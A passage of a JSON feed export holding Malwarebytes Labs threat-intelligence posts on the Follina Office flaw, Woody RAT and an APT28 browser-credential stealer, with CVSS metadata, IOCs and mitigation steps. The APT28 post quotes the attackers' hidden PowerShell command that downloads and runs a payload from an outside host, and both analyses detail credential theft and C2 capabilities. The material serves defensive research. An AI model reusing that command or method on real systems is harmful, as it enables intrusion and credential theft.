)\n\nThe post [FAQ: Mitigating Microsoft Office&#x27;s &#x27;Follina&#x27; zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T16:36:44", "type": "malwarebytes", "title": "FAQ: Mitigating Microsoft Office\u2019s \u2018Follina\u2019 zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T16:36:44", "id": "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T15:17:43", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat&#x27;s distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods \n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png> \"\" )Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called &quot;_Information security memo_&quot; which provide security practices for passwords, confidential information, etc. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png> \"\" )Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3.png> \"\" )Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4.png> \"\" )main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request. \n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png> \"\" )get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png> \"\" )RSA Encryption routine\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png> \"\" )AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8.png> \"\" )knock request headers\n\n**submit **- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** - The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with &quot;_CRY&quot; then the malware proceeds to send the knock request again but if the C2 responds with &quot;_ACK&quot; the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9.png> \"\" )Command execution routine\n\n**_SET Commands**\n\n * **PING** - This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** - Unknown command\n * **EXIT** - Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then &quot;_DAT&quot; is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png> \"\" )EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file. \n * **INFO** (Submit Information) - The INFO command is similar to the &quot;submit&quot; request above; this command sends the exact information to the C2 as sent by the &quot;submit&quot; request.\n\nINFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:\n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12.png> \"\" )INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs: \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13.png> \"\" )SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character. \n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png> \"\" )Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren&#x27;t any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n\n\n## IOCs\n\n**Woody** **Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited) \n\n\nThe post [Woody RAT: A new feature-rich malware spotted in the wild](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:25:52", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:25:52", "id": "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T14:35:47", "description": "_This blog post was authored by Hossein Jazi and Roberto Santos_.\n\nIn a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.\n\nAPT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and [US organizations](<https://blog.malwarebytes.com/reports/2021/07/beware-password-spraying-fancy-bears/>), including US nuclear facilities.\n\nOn June 20, 2022, Malwarebytes Threat Intelligence [identified](<https://twitter.com/h2jazi/status/1538957205210337280>) a document that had been weaponized with the [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by [Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). The discovery was also made [independently by CERT-UA](<https://cert.gov.ua/article/341128>).\n\nFollina is a recently-discovered zero-day exploit that uses the `ms-msdt` protocol to load malicious code from Word documents when they are opened. This is the first time we&#x27;ve observed APT28 using Follina in its operations. \n\n## The malicious document\n\nThe maldoc&#x27;s filename, `Nuclear Terrorism A Very Real Threat.rtf`, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. \n\nThe content of the document is an article from the [Atlantic Council](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) called &quot;_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_&quot; published on May 10 this year.\n\nThe lure asks &quot;Will Putin use nuclear weapons in Ukraine?&quot;\n\nThe maldoc is a docx file (pretending to be a RTF file) compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the `Document.xml.rels` file to retrieve a remote HTML file from the URL [http://kitten-268.frge.io/article.html](<https://www.virustotal.com/gui/url/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png> \"\" )The malicious HTML document\n\nThe HTML file uses a JavaScript call to `window.location.href` to load and execute an encoded PowerShell script using the `ms-msdt` MSProtocol URI scheme. The decoded script uses `cmd` to run PowerShell code that downloads and executes the final payload:\n \n \n \"C:\\WINDOWS\\system32\\cmd.exe\" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile \"C:\\Users\\$ENV:UserName\\SQLite.Interop.dll\";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile \"C:\\Users\\$ENV:UserName\\docx.exe\";Start-Process \"C:\\Users\\$ENV:UserName\\docx.exe\"}\"\n\n## Payload Analysis\n\nThe final payload is a variant of a stealer APT28 has [used against targets in Ukraine](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>) before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup. \n\nIn older versions of the stealer, a fake error message distracted users \n\nThe variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png> \"\" )A side-by-side comparison of two versions of the APT28 stealer\n\nAs with the previous variant, the stealer&#x27;s main pupose is to steal data from several popular browsers.\n\n### Google Chrome and Microsoft Edge\n\nThe malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data`.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png> \"\" )Debugging session showing how attackers are capable of stealing credentials\n\nIn a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies`. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png> \"\" )Cookie stealing code (Google Chrome)\n\nStolen cookies can sometimes be used to break into websites even if the username and password aren&#x27;t saved to the browser.\n\nThe code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.\n\n### Firefox\n\nThis malware can also steal data from Firefox. It does this by iterating through every profile looking for the `cookies.sqlite` file that stores the cookies for each user.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png> \"\" )Sysmon capturing access to cookies.sqlite file\n\nIn the case of passwords, the attackers attempt to steal `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db`, `signons.sqlite`.\n\nAttackers will grab also passwords from Firefox\n\nThese files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (`signons.sqlite`, `key3.db` and `cert8.db` are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.\n\n## Exfiltrating data\n\nThe malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png> \"\" )The IMAP login event\n\nThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\n\nIt&#x27;s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.\n\nAlthough ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.\n\nFor more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has [targeted Russia repeatedly since Ukraine invasion](<https://blog.malwarebytes.com/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/>).\n\n## Protection\n\nMalwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.\n\n\n\n## IOCs\n\n**Maldoc: \n**Nuclear Terrorism A Very Real Threat.rtf \ndaaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 \n \n**Remote template (Follina): \n**http://kitten-268.frge[.]io/article.html \n \n**Stealer: \n**http://kompartpomiar[.]pl/grafika/docx.exe \n2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933 \n \n**C2: \n**www.specialityllc[.]com \n[](<https://twitter.com/h2jazi/status/1538957205210337280/photo/1>)\n\nThe post [Russia&#x27;s APT28 uses fear of nuclear war to spread Follina docs in Ukraine](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-21T15:25:09", "type": "malwarebytes", "title": "Russia\u2019s APT28 uses fear of nuclear war to spread Follina docs in Ukraine", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-21T15:25:09", "id": "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "_**Update: Please see our [FAQ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) for the latest guidance and mitigation tips on Follina.**_\n\nOn Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.\n\nThe [mitigation](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) offered by Microsoft consists of an alternative method to unregister the MSDT URL Protocol. \nSeveral researchers have come across a novel attack that circumvents Microsoft&#x27;s Protected View and anti-malware detection.\n\nThe attack vector uses the Word remote template feature to retrieve an HTML file from a remote webserver. It goes on to use the `ms-msdt` protocol URI scheme to load some code, and then execute some PowerShell.\n\nAll of the above methods are features, but if we tell you that put together this allows an attacker to remotely run code on your system by tricking you into clicking a link, that sounds quite disturbing doesn\u2019t it?\n\nWell, you&#x27;d be right to be concerned. That little sequence of features adds up to a zero-day flaw in Microsoft Office that is being abused in the wild to achieve arbitrary code execution on Windows systems. \n\nJerome Segura, Malwarebytes&#x27; Senior Director, Threat Intelligence:\n\n> This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office&#x27;s remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros.\n\nThe most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office **Follina**, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.\n\nThe first researcher to find and report Follina used in the wild goes by the handle [@CrazymanArmy](<https://twitter.com/CrazymanArmy/status/1531120929321152512?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>). Our own analyst Hossein Jazi had also spotted the same maldoc, although at the time the remote template was down, leaving out a critical piece of the attack chain.\n\n> Our threat intel analyst [@h2jazi](<https://twitter.com/h2jazi?ref_src=twsrc%5Etfw>) had spotted a sample using the msdt.exe RCE back in April. \n \nAt the time, the remote template was already down and therefore full identification was not possible. <https://t.co/03UU2ClMhv>\n> \n> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [May 30, 2022](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw>)\n\nIt was more recently made public again by [@nao_sec](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>).\n\n> Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the &quot;ms-msdt&quot; scheme to execute PowerShell code.<https://t.co/hTdAfHOUx3> [pic.twitter.com/rVSb02ZTwt](<https://t.co/rVSb02ZTwt>)\n> \n> -- nao_sec (@nao_sec) [May 27, 2022](<https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw>)\n\n## Affected versions\n\nUnder normal circumstances, files from potentially unsafe locations are opened as read only or in Protected View. However, this warning can be easily bypassed by changing the document to a Rich Text Format (RTF) file. By doing so, the code can run without even opening the document via the preview tab in Explorer.\n\nWhile the research is ongoing and the info security community is testing and probing, we are receiving some mixed signals whether the latest, fully patched, version of Office 365 is vulnerable to this type of attack or not. Older versions are certainly vulnerable, which already makes it a problem with a huge attack surface.\n\nResearcher Kevin Beaumont [provides the example](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) where an attacker can send an email with this text as a hyperlink:\n \n \n ms-excel:ofv|u|https://blah.com/poc.xls\n\nAnd Outlook will allow the user to click the hyperlink and open the Excel document. Because the document isn\u2019t attached to the email, and the URI doesn\u2019t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.\n\nAs we stated earlier, even looking at a specially crafted file in the preview pane of Windows Explorer could trigger the attack. Microsoft has been made aware of the issues and the possible consequences. While its first reaction was that there was no security issue, it seems this needs to be fixed.\n\n## Mitigation\n\nThere are a few things you can do to stop some or all of the \u201cfeatures\u201d used in this type of attack.\n\n### Unregister the ms-msdt protocol\n\nWill Dormann, a vulnerability analyst at the CERT/CC has [published a registry fix](<https://gist.github.com/wdormann/031962b9d388c90a518d2551be58ead7>) that will unregister the ms-msdt protocol.\n\nCopy and paste the text into a notepad document:\n\n * Click on **File**, then **Save As\u2026**\n * Save it to your Desktop, then name the file `disable_ms-msdt.reg` in the file name box.\n * Click **Save**, and close the notepad document.\n * Double-click the file `disable_ms-msdt.reg` on your desktop.\n\nNote, if you are prompted by User Account Control, select **Yes** or **Allow** so the fix can continue.\n\n * A message will appear about adding information into the registry, click **Yes** when prompted\n * A prompt should appear that the information was added successfully\n\n### Disable preview in Windows Explorer\n\nIf you have the preview pane enabled, you can:\n\n * Open File Explorer.\n * Click on **View** Tab.\n * Click on **Preview Pane** to hide it.\n\nThe post [Microsoft Office zero-day &quot;Follina&quot;\u2014it\u2019s not a bug, it\u2019s a feature! (It&#x27;s a bug)](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:09:26", "type": 